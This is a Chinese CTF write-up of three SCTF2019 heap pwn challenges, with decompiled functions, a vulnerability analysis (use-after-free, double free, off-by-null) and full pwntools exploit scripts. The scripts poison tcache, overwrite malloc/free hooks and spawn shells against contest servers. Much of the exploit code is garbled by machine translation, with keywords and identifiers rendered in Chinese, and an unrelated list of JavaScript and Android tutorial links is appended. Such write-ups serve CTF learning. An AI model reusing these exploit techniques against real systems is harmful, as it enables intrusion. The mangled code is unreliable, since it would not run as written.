SCTF2019pwn题解
时间:2022-06-24
本文章向大家介绍SCTF2019pwn题解,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
题目都是堆的题,第一题玄学爆破1/4096,做完校队师傅和我说他1/200的几率都没出来,果然比赛看人脸黑不黑。下面是详细的题解。
one_heap
题目看起来并不难,逻辑很简单,并且给了libc的是2.27的所以自然的联想到又tcache,接下来进行详细的分析。
静态分析
主要
逻辑很简单这里我进行了一个函数名的改变看起来清楚一点
void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
int i; // eax
flash();
while ( 1 )
{
for ( i = menu(); i != 1; i = menu() )
{
if ( i != 2 )
exit(0);
delete();
}
add(a1, a2);
}
}菜单
简单的选择逻辑没有什么问题
__int64 sub_C70()
{
unsigned __int64 v0; // ST08_8
__int64 result; // rax
unsigned __int64 v2; // rt1
v0 = __readfsqword(0x28u);
puts("1. new");
puts("2. delete");
_printf_chk(1LL, "Your choice:");
v2 = __readfsqword(0x28u);
result = v2 ^ v0;
if ( v2 == v0 )
result = sub_C10();
return result;删除
这里是主要的问题点,存在一个uaf的漏洞但是同样对free的次数存在限制总共只能免费4次,然后自由的时候是没有idx选择,每次ptr位置只有一个堆块的地址。
unsigned __int64 sub_D90()
{
unsigned __int64 v1; // [rsp+8h] [rbp-10h]
v1 = __readfsqword(0x28u);
if ( !dword_202014 )
exit(0);
free(ptr);
puts("Done!");
--dword_202014;
return __readfsqword(0x28u) ^ v1;
}加
这里任意的malloc的大小存在限制,并且malloc的的数量也是固定的,然后的malloc后可以读入堆。
unsigned __int64 add()
{
unsigned int v0; // eax
size_t v1; // rbx
unsigned __int64 v3; // [rsp+8h] [rbp-10h]
v3 = __readfsqword(0x28u);
if ( !dword_202010 )
LABEL_5:
exit(0);
_printf_chk(1LL, "Input the size:");
v0 = sub_C10(1LL, "Input the size:");
v1 = (signed int)v0;
if ( v0 > 0x7F )
{
puts("Invalid size!");
goto LABEL_5;
}
_printf_chk(1LL, "Input the content:");
ptr = malloc(v1);
sub_B70(ptr, v1);
puts("Done!");
--dword_202010;
return __readfsqword(0x28u) ^ v3;
}思路分析
- 因为存在tcache所以这里双免费利用起来会比较顺手,但是存在一个问题如何去泄漏。这里参考了HITCON2018的baby_tcache的泄漏思路,是利用覆盖stdout的write_buf实现的。
- 还有个问题如何能染tcache被malloc的到那个位置,这里我采用的是利用堆和代码段偏移来爆破几率大概是在1/4096,这个几率真的看脸了......
- 再去改写malloc_hook,这里会发现3个一个都没有办法用,所以只能用的realloc的特技来调整栈去getshell。
这里调试可以吧本地随机化关了,如果预期解是这样的话..我就真的没话说了,如果这是非预期..(对不住了出题人..
EXP:
来自 pwn import *
context 。log_level = “debug”
p = process (“./ one_heap” )
a = ELF (“./libc-2.27.so” )#
p = remote(“47.104.89.129”,10001)
gdb 。attach (p )
def new (size ,content ):
p 。recvuntil (“你的选择:” )
p 。sendline (“1” )
p 。recvuntil(“输入大小:” )
p 。sendline (str (size ))
p 。recvuntil (“输入内容:” )
p 。sendline (content )
def remove ():
p 。recvuntil (“你的选择:” )
p 。sendline (“2” )
def new0 (size ,content ):
p 。recvuntil (“你的选择:” )
p 。sendline (“1” )
p 。recvuntil (“输入大小:” )
p 。sendline (str (size ))
p 。recvuntil (“输入内容:” )
p 。send (content )
new (0x60 ,“aaa” )
remove ()
remove ()
new (0x60 ,“ x20 x60 ” )
new (0x60 ,“b” )
raw_input ()
new (0x60 ,“ x60 x07 ” )
pay = p64 (0xfbad1880 ) + p64 (0 )* 3 + “ x00 ”
new (0x60 ,pay )
libc_addr = u64 (p 。recvuntil (“ x7f ” )[ 8 :8 + 6 ] 。ljust (8 ,“ x00 ” ))- 0x3ed8b0
print hex (libc_addr )
malloc_hook = a 。符号[ “__malloc_hook” ] + libc_addr
relloc_hook = a 。符号[ “__realloc_hook” ] + libc_addr
print hex (malloc_hook )
one = 0x4f2c5 + libc_addr
打印 一个
新的(为0x50 ,“A” )
除去()
删除()
新(为0x50 ,P64 (relloc_hook ))
新(为0x50 ,“花生” )
新的(为0x50 ,P64 (一个)+ P64 (libc_addr + 一个。符号[ 'realloc' ] + 0xe ))
打印 hex (one )
new(0x30 ,“b” )
p 。互动()two_heap
这个题刚开始感觉是和one_heap相同,可能也是爆破,但是发现了大小存在限制需要绕过所以就不想one_heap了,这个尺寸限制导致我们只能利用3个左右的堆块。
静态分析
主要
这里我也标出了函数,这个函数主要的作用是在泄漏上,因为printf_chk可以做到用%一去泄漏,具体可以参考BCTF和HCTF的题。
void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
int v3; // eax
__int64 v4; // [rsp+1Ch] [rbp-1Ch]
int v5; // [rsp+24h] [rbp-14h]
unsigned __int64 v6; // [rsp+28h] [rbp-10h]
v6 = __readfsqword(0x28u);
sub_12D0(a1, a2, a3);
v4 = 0LL;
v5 = 0;
puts("Welcome to SCTF:");
leak(&v4, 11);
__printf_chk(1LL, &v4, 0xFFFFFFFFLL, 0xFFFFFFFFLL, 0xFFFFFFFFLL);
while ( 1 )
{
while ( 1 )
{
v3 = menu();
if ( v3 != 1 )
break;
add();
}
if ( v3 != 2 )
{
puts("exit.");
exit(0);
}
del();
}
}加
主要是增加了堆块,并且进行了一个位运算使得末尾成为了一个为0x0或者是0x8中的数,当然这里是可以绕过的,他没有检查堆块大小的大小所以可以魔改操作一波
unsigned __int64 sub_14A0()
{
FILE **v0; // rbp
__int64 v1; // rbx
__int64 **v2; // rax
int v3; // er12
__int64 *v4; // rbp
__int64 **v5; // rbx
unsigned __int64 v7; // [rsp+8h] [rbp-30h]
v0 = (FILE **)&off_4020;
v1 = 0LL;
v7 = __readfsqword(0x28u);
v2 = &off_4020;
while ( v2[1] )
{
++v1;
v2 += 2;
if ( v1 == 8 )
goto LABEL_4;
}
puts("Input the size:");
v3 = sub_13E0("Input the size:") & 0xFFFFFFF8;
if ( v3 > 128 )
goto LABEL_4;
do
{
if ( *(_DWORD *)v0 == v3 )
{
puts("I don't like the same size!");
exit(0);
}
v0 += 2;
}
while ( &stdout != v0 );
v4 = (__int64 *)malloc(v3);
if ( !v4 )
LABEL_4:
exit(0);
puts("Input the note:");
v5 = &(&off_4020)[2 * v1];
leak(v4, v3);
*(_DWORD *)v5 = v3;
v5[1] = v4;
return __readfsqword(0x28u) ^ v7;
}德尔
删除函数同样是没有对指针置0,漏洞很明显,就是利用起来比较困难了。这里检查了一下IDX是否符合要求。
void sub_15A0()
{
__int64 v0; // rax
unsigned __int64 v1; // [rsp+8h] [rbp-10h]
v1 = __readfsqword(0x28u);
puts("Input the index:");
v0 = (signed int)sub_13E0("Input the index:");
if ( (unsigned __int64)(signed int)v0 > 7 )
exit(0);
if ( __readfsqword(0x28u) == v1 )
free((&off_4020)[2 * v0 + 1]);
}思路分析
- 首先因为存在printf_chk可以用一%泄漏去,这里有个小技巧,当得到的是p字符的时候用0去替换掉。然后就可以计算出地址,有了泄漏的地址就容易的多了
- 有了泄漏利用malloc size = 0x1,0x8,0x10,0x18来进行对size的绕过就可以利用了,说实话这个题比一简单..
感觉这个题目出的可以,都是知识盲区现找现查,学到很多。
EXP:
来自 pwn import *
context 。log_level = “debug”
#p = process(“./ two_heap”,env = {“LD_PRELOAD”:“。/ libc-2.26.so”})
a = ELF (“./ libc-2.26.so” )
p = remote (“47.104.89.129” ,10002 )
#gdb.attach(p)#,“b * 0x5555555554a0”)
def new (size ,content ):
p 。recvuntil (“你的选择:” )
p 。发送线(“1”
recvuntil (“输入大小:” )
p 。sendline (str (size ))
p 。recvuntil (“输入注释:” )
p 。sendline (content )
def remove (idx ):
p 。recvuntil (“你的选择:” )
p 。sendline (“2” )
p 。recvuntil (“输入索引:” )
p 。sendline (str (idx ))
def new0 (size ,content ):
p 。recvuntil (“你的选择:” )
p 。sendline (“1” )
p 。recvuntil (“输入大小:” )
p 。sendline (str (size ))
p 。recvuntil (“输入注释:” )
p 。发送(内容)
p 。recvuntil(“欢迎来到SCTF:” )
p 。sendline (“%a” * 5 )
p 。recvuntil (“0x0p + 00x0p + 00x0.0” )
lib_addr = INT (p 。recvuntil (“P-10220x” ,降= 真)+ “0” ,16 ) - 一个。符号[ “_IO_2_1_stdout_” ]
free_hook = a 。符号[ “__free_hook” ]+ lib_addr
system = lib_addr + a 。symbols [ “system” ]
print hex (lib_addr )
new0 (0x1 ,“” )
remove (0 )
remove (0 )
raw_input ()
new0 (0x8 ,p64 (free_hook ))
new0 (0x10 ,“ n ” )
new (24 ,p64 (system ))
new (0x60 ,“/ bin / sh x00 ” )
remove (4 )
p 。互动()easy_heap
这个题主要是在offbynull上,题目如果预期解是一个橘子的话这个题就复杂了很多但是其实用unlink解就容易多了。
静态分析
主要
主要实现了功能
void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
unsigned int v3; // [rsp+14h] [rbp-Ch]
unsigned __int64 v4; // [rsp+18h] [rbp-8h]
v4 = __readfsqword(0x28u);
v3 = 0;
sub_CD0();
while ( 1 )
{
while ( 1 )
{
menu();
_isoc99_scanf(&unk_12A8, &v3);
if ( v3 != 2 )
break;
del();
}
if ( v3 > 2 )
{
if ( v3 == 3 )
{
fill();
}
else
{
if ( v3 == 4 )
exit(0);
LABEL_13:
puts("Invalid choice!");
}
}
else
{
if ( v3 != 1 )
goto LABEL_13;
add();
}
}
}德尔
正常的一个删除函数
int del()
{
void *v0; // rax
unsigned int v2; // [rsp+Ch] [rbp-4h]
printf("Index: ");
v2 = sub_EE5();
if ( v2 <= 0xF && qword_202060[2 * v2 + 1] )
{
free(qword_202060[2 * v2 + 1]);
qword_202060[2 * v2 + 1] = 0LL;
qword_202060[2 * v2] = 0LL;
v0 = &unk_202040;
--unk_202040;
}
else
{
LODWORD(v0) = puts("Invalid index.");
}
return (signed int)v0;填
这里存在一个off by null的漏洞是可以利用的
int fill()
{
unsigned int v1; // [rsp+4h] [rbp-Ch]
printf("Index: ");
v1 = sub_EE5();
if ( v1 > 0xF || !qword_202060[2 * v1 + 1] )
return puts("Invalid index.");
printf("Content: ");
return input((__int64)qword_202060[2 * v1 + 1], (unsigned __int64)qword_202060[2 * v1]);
}思路分析
- 进行一个unlink控制全局变量,这题还有别的解法就是off by null来unlink或者largebin attack去控制和写入mmap的内存
- 写入mmap内存为shellcode然后利用fastbin attack改写malloc_hook
这里的方法细节是在bss段构造一个fakechunk然后自由进入unsortedbin会有libc地址残留在指针处,然后改指针的低位,就可以malloc到需要的地方,然后改malloc_hook为一就可以了。
EXP
来自 pwn import *
context 。arch = “amd64”
上下文。log_level = “debug”
#p = process(“./ easy_heap”)#,env = {“LD_PRELOAD”:“。/ libc.so.6”})
a = ELF (“./ easy_heap” )
e = a 。libc的
打印 十六进制(É 。符号[ “放” ])
p = 远程(“132.232.100.67” ,10004 )
#gdb.attach(P)#, “B * 0x5555555554a0”
(大小):
p 。recvuntil (“>>” )
p 。sendline (“1” )
p 。recvuntil (“大小:” )
p 。sendline (str (size ))
def remove (idx ):
p 。recvuntil (“>>” )
p 。sendline (“2” )
p 。recvuntil (“索引:” )
p 。sendline (str (idx ))
def edit (idx ,content ):
p 。recvuntil (“>>” )
p 。sendline (“3” )
p 。recvuntil (“索引:” )
p 。sendline (str (idx ))
p 。recvuntil (“内容:” )
p 。sendline (内容)
p 。recvuntil (“MMAP:” )
mmap_addr = INT (p 。recvuntil (“ n ” ,降= 真),16 )
打印 进制(mmap_addr )
添加(0xF8的)
p 。recvuntil (“地址0X” )
地址 = INT (p 。recvline () 。条(),16 ) - 0x202068
添加(0xf8 )
add (0x20 )
edit (0 ,p64 (0 )+ p64 (0xf1 )+ p64 (addr + 0x202068 - 0x18 )+ p64 (addr + 0x202068 - 0x10 )+ “a” * 0xd0 + p64 (0xf0 ))
删除(1 )
编辑(0 ,p64(0 )* 2 + P64 (0xF8的)+ P64 (地址+ 0x202078 )+ P64 (0x140 )+ P64 (mmap_addr ))
编辑(1 ,ASM (shellcraft 。SH ()))
bss_addr = 0x202040
编辑(0 ,P64 (addr + 0x202090 )+ p64 (0x20 )+ p64 (0x91 )+ p64 (0 )* 17 + p64 (0x21 )* 5 )
删除(1 )
编辑(0 ,p64 (0 )* 3 + p64 (0x100 )+ ' x10 ' )
编辑(3 ,p64)(mmap_addr ))
add (0x20 )
p。互动()总结
题目感觉还是挺有质量的,就是怪自己手速太慢,没拿到几个血,我TCL,WSL。
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- Android嵌套滑动冲突的解决方法
- Android应用图标上的小红点Badge实践代码
- 详解Android studio中正确引入so文件的方法
- Android ViewFlipper的详解及实例
- Android编程实现拍照功能的2种方法分析
- 在Ubuntu/Linux环境下使用MySQL开放/修改3306端口和开放访问权限
- 10大HBase常见运维工具整理小结
- Android实现扫一扫识别数字功能
- 通过SSH连接本地linux虚拟机的过程记录
- 实现Android 获取cache缓存的目录路径的方法
- Android 消息分发使用EventBus的实例详解
- 详解Android实现定时器的几种方法
- Android 实现带进度条的WebView的实例
- Android单元测试之对Activity的测试示例
- Android开发之手势检测及通过手势实现翻页功能的方法